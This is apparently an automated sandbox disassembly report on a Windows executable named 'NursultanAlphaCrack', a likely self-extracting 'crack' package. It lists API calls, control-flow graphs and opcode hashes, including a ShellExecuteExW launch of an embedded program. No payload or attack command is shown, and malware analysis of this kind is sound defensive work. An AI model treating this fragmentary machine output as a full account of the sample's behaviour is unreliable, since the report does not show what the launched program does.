                                                                                        • Opcode ID: 735850bc8d503106c5093dbb10bbf79a3e8dddfb8976f3fd4e7e7708c6454035
                                                                                        • Instruction ID: 320fa09b223255660b9613b632ed4be346ccf38426754503e08f82daa027cf18
                                                                                        • Opcode Fuzzy Hash: 735850bc8d503106c5093dbb10bbf79a3e8dddfb8976f3fd4e7e7708c6454035
                                                                                        • Instruction Fuzzy Hash: EAE152B2900259AADB25DBA4ED85EEE73BCAB14350F4045A7F609E7140EF749F84CF60
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001CDA70
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001CDAAC
                                                                                          • Part of subcall function 001CC29A: _wcslen.LIBCMT ref: 001CC2A2
                                                                                          • Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0
                                                                                          • Part of subcall function 001D1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001CBAE9,00000000,?,?,?,00010440), ref: 001D1BA0
                                                                                        • _wcslen.LIBCMT ref: 001CDDE9
                                                                                        • __fprintf_l.LIBCMT ref: 001CDF1C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMulusermeWide__fprintf_l
                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                        • API String ID: 566448164-801612888
                                                                                        • Opcode ID: 1ec2e87e4f2cf17438a497424379f0c9e294676f5e1506cc93609ee383f47625
                                                                                        • Instruction ID: 77434fea6e7075c9e7754c1468b5e9f8b60bfef29cb6999714f48b090ca0bc0f
                                                                                        • Opcode Fuzzy Hash: 1ec2e87e4f2cf17438a497424379f0c9e294676f5e1506cc93609ee383f47625
                                                                                        • Instruction Fuzzy Hash: 1932BF71A00258AACB24EF64D846FEE77A5FF28704F44016EF90697281E7B1DD95CB90

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 001DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
                                                                                          • Part of subcall function 001DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
                                                                                          • Part of subcall function 001DB568: IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
                                                                                          • Part of subcall function 001DB568: TranslateMessage.USER32(?), ref: 001DB5AC
                                                                                          • Part of subcall function 001DB568: DispatchMessageW.USER32(?), ref: 001DB5B6
                                                                                        • GetDlgItem.USER32(00000068,0021FCB8), ref: 001DD4E8
                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,001DAF07,00000001,?,?,001DB7B9,001F506C,0021FCB8,0021FCB8,00001000,00000000,00000000), ref: 001DD510
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001DD51B
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,001F35F4), ref: 001DD529
                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD53F
                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001DD559
                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD59D
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001DD5AB
                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001DD5BA
                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001DD5E1
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,001F43F4), ref: 001DD5F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                        • String ID: \
                                                                                        • API String ID: 3569833718-2967466578
                                                                                        • Opcode ID: da6a1de8fc0db86c4a9f0dd9478efab099d831f6c46460e9d1bf9c71f37bd91b
                                                                                        • Instruction ID: 4e6bd0076f93fef982aaf4e5384decf9b71f27a810b005d33cc1250c594ba9c3
                                                                                        • Opcode Fuzzy Hash: da6a1de8fc0db86c4a9f0dd9478efab099d831f6c46460e9d1bf9c71f37bd91b
                                                                                        • Instruction Fuzzy Hash: 0731BE71145342BBE311DF60BC4EFAB7BACEB86704F000509F691D62A1DF688B068B76

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 836 1dd78f-1dd7a7 call 1dec50 839 1dd7ad-1dd7b9 call 1e3e13 836->839 840 1dd9e8-1dd9f0 836->840 839->840 843 1dd7bf-1dd7e7 call 1dfff0 839->843 846 1dd7e9 843->846 847 1dd7f1-1dd7ff 843->847 846->847 848 1dd801-1dd804 847->848 849 1dd812-1dd818 847->849 851 1dd808-1dd80e 848->851 850 1dd85b-1dd85e 849->850 850->851 854 1dd860-1dd866 850->854 852 1dd837-1dd844 851->852 853 1dd810 851->853 856 1dd84a-1dd84e 852->856 857 1dd9c0-1dd9c2 852->857 855 1dd822-1dd82c 853->855 858 1dd86d-1dd86f 854->858 859 1dd868-1dd86b 854->859 860 1dd82e 855->860 861 1dd81a-1dd820 855->861 862 1dd854-1dd859 856->862 863 1dd9c6 856->863 857->863 864 1dd882-1dd898 call 1cb92d 858->864 865 1dd871-1dd878 858->865 859->858 859->864 860->852 861->855 867 1dd830-1dd833 861->867 862->850 870 1dd9cf 863->870 871 1dd89a-1dd8a7 call 1d1fbb 864->871 872 1dd8b1-1dd8bc call 1ca231 864->872 865->864 868 1dd87a 865->868 867->852 868->864 873 1dd9d6-1dd9d8 870->873 871->872 881 1dd8a9 871->881 882 1dd8be-1dd8d5 call 1cb6c4 872->882 883 1dd8d9-1dd8e6 ShellExecuteExW 872->883 876 1dd9da-1dd9dc 873->876 877 1dd9e7 873->877 876->877 880 1dd9de-1dd9e1 ShowWindow 876->880 877->840 880->877 881->872 882->883 883->877 885 1dd8ec-1dd8f9 883->885 887 1dd90c-1dd90e 885->887 888 1dd8fb-1dd902 885->888 889 1dd925-1dd944 call 1ddc3b 887->889 890 1dd910-1dd919 887->890 888->887 891 1dd904-1dd90a 888->891 892 1dd97b-1dd987 CloseHandle 889->892 905 1dd946-1dd94e 889->905 890->889 899 1dd91b-1dd923 ShowWindow 890->899 891->887 891->892 893 1dd989-1dd996 call 1d1fbb 892->893 894 1dd998-1dd9a6 892->894 893->870 893->894 894->873 898 1dd9a8-1dd9aa 894->898 898->873 902 1dd9ac-1dd9b2 898->902 899->889 902->873 904 1dd9b4-1dd9be 902->904 904->873 905->892 906 1dd950-1dd961 GetExitCodeProcess 905->906 906->892 907 1dd963-1dd96d 906->907 908 1dd96f 907->908 909 1dd974 907->909 908->909 909->892
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 001DD7AE
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 001DD8DE
                                                                                        • ShowWindow.USER32(?,00000000), ref: 001DD91D
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 001DD959
                                                                                        • CloseHandle.KERNEL32(?), ref: 001DD97F
                                                                                        • ShowWindow.USER32(?,00000001), ref: 001DD9E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                        • String ID: .exe$.inf
                                                                                        • API String ID: 36480843-3750412487
                                                                                        • Opcode ID: d9282a0e09118f60d363cb78ad230034201946c45befde4d33c7b29969def351
                                                                                        • Instruction ID: 20aab3fae5dedb5e4c8b44d38e5f93a5a3c1f84e73f7623b11ae7966ae1fa228
                                                                                        • Opcode Fuzzy Hash: d9282a0e09118f60d363cb78ad230034201946c45befde4d33c7b29969def351
                                                                                        • Instruction Fuzzy Hash: 63510370008380AADB319F24B854BBBBBE4AF91748F04041FF5C0973A1EB768E84DB52

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 910 1ea95b-1ea974 911 1ea98a-1ea98f 910->911 912 1ea976-1ea986 call 1eef4c 910->912 913 1ea99c-1ea9c0 MultiByteToWideChar 911->913 914 1ea991-1ea999 911->914 912->911 922 1ea988 912->922 916 1ea9c6-1ea9d2 913->916 917 1eab53-1eab66 call 1dfbbc 913->917 914->913 919 1eaa26 916->919 920 1ea9d4-1ea9e5 916->920 926 1eaa28-1eaa2a 919->926 923 1ea9e7-1ea9f6 call 1f2010 920->923 924 1eaa04-1eaa15 call 1e8e06 920->924 922->911 929 1eab48 923->929 937 1ea9fc-1eaa02 923->937 924->929 938 1eaa1b 924->938 926->929 930 1eaa30-1eaa43 MultiByteToWideChar 926->930 932 1eab4a-1eab51 call 1eabc3 929->932 930->929 931 1eaa49-1eaa5b call 1eaf6c 930->931 939 1eaa60-1eaa64 931->939 932->917 941 1eaa21-1eaa24 937->941 938->941 939->929 942 1eaa6a-1eaa71 939->942 941->926 943 1eaaab-1eaab7 942->943 944 1eaa73-1eaa78 942->944 946 1eaab9-1eaaca 943->946 947 1eab03 943->947 944->932 945 1eaa7e-1eaa80 944->945 945->929 948 1eaa86-1eaaa0 call 1eaf6c 945->948 950 1eaacc-1eaadb call 1f2010 946->950 951 1eaae5-1eaaf6 call 1e8e06 946->951 949 1eab05-1eab07 947->949 948->932 963 1eaaa6 948->963 954 1eab09-1eab22 call 1eaf6c 949->954 955 1eab41-1eab47 call 1eabc3 949->955 950->955 966 1eaadd-1eaae3 950->966 951->955 962 1eaaf8 951->962 954->955 968 1eab24-1eab2b 954->968 955->929 967 1eaafe-1eab01 962->967 963->929 966->967 967->949 969 1eab2d-1eab2e 968->969 970 1eab67-1eab6d 968->970 971 1eab2f-1eab3f WideCharToMultiByte 969->971 970->971 971->955 972 1eab6f-1eab76 call 1eabc3 971->972 972->932
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001E5695,001E5695,?,?,?,001EABAC,00000001,00000001,2DE85006), ref: 001EA9B5
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001EABAC,00000001,00000001,2DE85006,?,?,?), ref: 001EAA3B
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001EAB35
                                                                                        • __freea.LIBCMT ref: 001EAB42
                                                                                          • Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38
                                                                                        • __freea.LIBCMT ref: 001EAB4B
                                                                                        • __freea.LIBCMT ref: 001EAB70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1414292761-0
                                                                                        • Opcode ID: 2dfb06de45cf70bf2f6ec62be99ddc470a76a0c992905a6678af38788b8bcb18
                                                                                        • Instruction ID: a04cc3d3a21487d037f330507d0d990e36f40a2afdfc6b885f34863e11964855
                                                                                        • Opcode Fuzzy Hash: 2dfb06de45cf70bf2f6ec62be99ddc470a76a0c992905a6678af38788b8bcb18
                                                                                        • Instruction Fuzzy Hash: 1851F672600A56AFDB258F66CC41EBFB7AAEF84750F954629FC04D7140EB34EC40C6A2

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 975 1e3b72-1e3b7c 976 1e3bee-1e3bf1 975->976 977 1e3b7e-1e3b8c 976->977 978 1e3bf3 976->978 980 1e3b8e-1e3b91 977->980 981 1e3b95-1e3bb1 LoadLibraryExW 977->981 979 1e3bf5-1e3bf9 978->979 982 1e3c09-1e3c0b 980->982 983 1e3b93 980->983 984 1e3bfa-1e3c00 981->984 985 1e3bb3-1e3bbc GetLastError 981->985 982->979 986 1e3beb 983->986 984->982 989 1e3c02-1e3c03 FreeLibrary 984->989 987 1e3bbe-1e3bd3 call 1e6088 985->987 988 1e3be6-1e3be9 985->988 986->976 987->988 992 1e3bd5-1e3be4 LoadLibraryExW 987->992 988->986 989->982 992->984 992->988
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,001E3C35,?,?,00222088,00000000,?,001E3D60,00000004,InitializeCriticalSectionEx,001F6394,InitializeCriticalSectionEx,00000000), ref: 001E3C03
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 3664257935-2084034818
                                                                                        • Opcode ID: d7d825bbf7892015d26f5a8bb83d32cae72867517f85291b4d86085664df72ea
                                                                                        • Instruction ID: e108bbc6aa66896656272c837e604d46255fb3586c6fb37e156e3cd88de0ec5d
                                                                                        • Opcode Fuzzy Hash: d7d825bbf7892015d26f5a8bb83d32cae72867517f85291b4d86085664df72ea
                                                                                        • Instruction Fuzzy Hash: 1F112C31A04A64ABCB328B5A9C49B5E77649F01770F250111F936FB290D731EF40C6D1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 993 1dabab-1dabca GetClassNameW 994 1dabcc-1dabe1 call 1d1fbb 993->994 995 1dabf2-1dabf4 993->995 1000 1dabf1 994->1000 1001 1dabe3-1dabef FindWindowExW 994->1001 996 1dabff-1dac01 995->996 997 1dabf6-1dabf8 995->997 997->996 1000->995 1001->1000
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 001DABC2
                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 001DABF9
                                                                                          • Part of subcall function 001D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001CC116,00000000,.exe,?,?,00000800,?,?,?,001D8E3C), ref: 001D1FD1
                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 001DABE9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                        • String ID: @Uxu$EDIT
                                                                                        • API String ID: 4243998846-59804995
                                                                                        • Opcode ID: c2a1e0fb229bcb10e2476ac05c37098b1b7b618394404aac0215e3a35bc06563
                                                                                        • Instruction ID: 70150190ebba79f8dc81f151c1a514a24841e72f4a2592ce606960b8d562b6f1
                                                                                        • Opcode Fuzzy Hash: c2a1e0fb229bcb10e2476ac05c37098b1b7b618394404aac0215e3a35bc06563
                                                                                        • Instruction Fuzzy Hash: 11F0823260122877DB30D764AC09F9B76AC9F46B40F484013BA05B22C0D766DF4685BA

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1002 1c98e0-1c9901 call 1dec50 1005 1c990c 1002->1005 1006 1c9903-1c9906 1002->1006 1008 1c990e-1c991f 1005->1008 1006->1005 1007 1c9908-1c990a 1006->1007 1007->1008 1009 1c9927-1c9931 1008->1009 1010 1c9921 1008->1010 1011 1c9936-1c9943 call 1c6edb 1009->1011 1012 1c9933 1009->1012 1010->1009 1015 1c994b-1c996a CreateFileW 1011->1015 1016 1c9945 1011->1016 1012->1011 1017 1c996c-1c998e GetLastError call 1cbb03 1015->1017 1018 1c99bb-1c99bf 1015->1018 1016->1015 1021 1c99c8-1c99cd 1017->1021 1027 1c9990-1c99b3 CreateFileW GetLastError 1017->1027 1019 1c99c3-1c99c6 1018->1019 1019->1021 1022 1c99d9-1c99de 1019->1022 1021->1022 1024 1c99cf 1021->1024 1025 1c99ff-1c9a10 1022->1025 1026 1c99e0-1c99e3 1022->1026 1024->1022 1029 1c9a2e-1c9a39 1025->1029 1030 1c9a12-1c9a2a call 1d0602 1025->1030 1026->1025 1028 1c99e5-1c99f9 SetFileTime 1026->1028 1027->1019 1031 1c99b5-1c99b9 1027->1031 1028->1025 1030->1029 1031->1019
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,001C7760,?,00000005,?,00000011), ref: 001C995F
                                                                                        • GetLastError.KERNEL32(?,?,001C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C996C
                                                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,001C7760,?,00000005,?), ref: 001C99A2
                                                                                        • GetLastError.KERNEL32(?,?,001C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C99AA
                                                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001C7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C99F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                        • String ID:
                                                                                        • API String ID: 1999340476-0
                                                                                        • Opcode ID: 33e97bc0644a1826e738e630919bbc0221633a12ca9c946d1837d5627cafa01b
                                                                                        • Instruction ID: 3f63196131a73f6c27d79911592a0f5b7ea92e0d62e3b6eda509fb97f7c6bc86
                                                                                        • Opcode Fuzzy Hash: 33e97bc0644a1826e738e630919bbc0221633a12ca9c946d1837d5627cafa01b
                                                                                        • Instruction Fuzzy Hash: 363122305447856FE7309F24CC4AFEABB94BB24324F200B1EF9A1965D0D7B4E994CB91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1061 1db568-1db581 PeekMessageW 1062 1db5bc-1db5be 1061->1062 1063 1db583-1db597 GetMessageW 1061->1063 1064 1db599-1db5a6 IsDialogMessageW 1063->1064 1065 1db5a8-1db5b6 TranslateMessage DispatchMessageW 1063->1065 1064->1062 1064->1065 1065->1062
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
                                                                                        • IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
                                                                                        • TranslateMessage.USER32(?), ref: 001DB5AC
                                                                                        • DispatchMessageW.USER32(?), ref: 001DB5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1266772231-0
                                                                                        • Opcode ID: a1bd96d773d7e3ae8ab262bd0afcb0cad83b5d323b4750806ff12bbec9aeeeef
                                                                                        • Instruction ID: 338b96a6b022573fda107849bb13f3b8a129707242fa1582db6cb1d8777d6240
                                                                                        • Opcode Fuzzy Hash: a1bd96d773d7e3ae8ab262bd0afcb0cad83b5d323b4750806ff12bbec9aeeeef
                                                                                        • Instruction Fuzzy Hash: 3BF0BD71A0121ABBCB20DBE5BC4CDDB7FACEE056917004415B50AD2110EB38D606CBB4

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 001D081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
                                                                                          • Part of subcall function 001D081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858
                                                                                        • OleInitialize.OLE32(00000000), ref: 001DAC2F
                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001DAC66
                                                                                        • SHGetMalloc.SHELL32(00208438), ref: 001DAC70
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                        • String ID: riched20.dll
                                                                                        • API String ID: 3498096277-3360196438
                                                                                        • Opcode ID: a8985894e7de425044b6af7ebcef4e001e79199194faf8ed0d33aa342bb9f242
                                                                                        • Instruction ID: 29faab795745b9f0fac9a15e8cd2b982688308c79f2405b18d423aac4999cfa9
                                                                                        • Opcode Fuzzy Hash: a8985894e7de425044b6af7ebcef4e001e79199194faf8ed0d33aa342bb9f242
                                                                                        • Instruction Fuzzy Hash: EEF0FFB1D00209ABCB20AFA9D8499EFFBFCEF94700F004156A455A2241DBB856068BA1

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1070 1ddbde-1ddc09 call 1dec50 SetEnvironmentVariableW call 1d0371 1074 1ddc0e-1ddc12 1070->1074 1075 1ddc14-1ddc18 1074->1075 1076 1ddc36-1ddc38 1074->1076 1077 1ddc21-1ddc28 call 1d048d 1075->1077 1080 1ddc1a-1ddc20 1077->1080 1081 1ddc2a-1ddc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1076
                                                                                        APIs
                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 001DDBF4
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001DDC30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
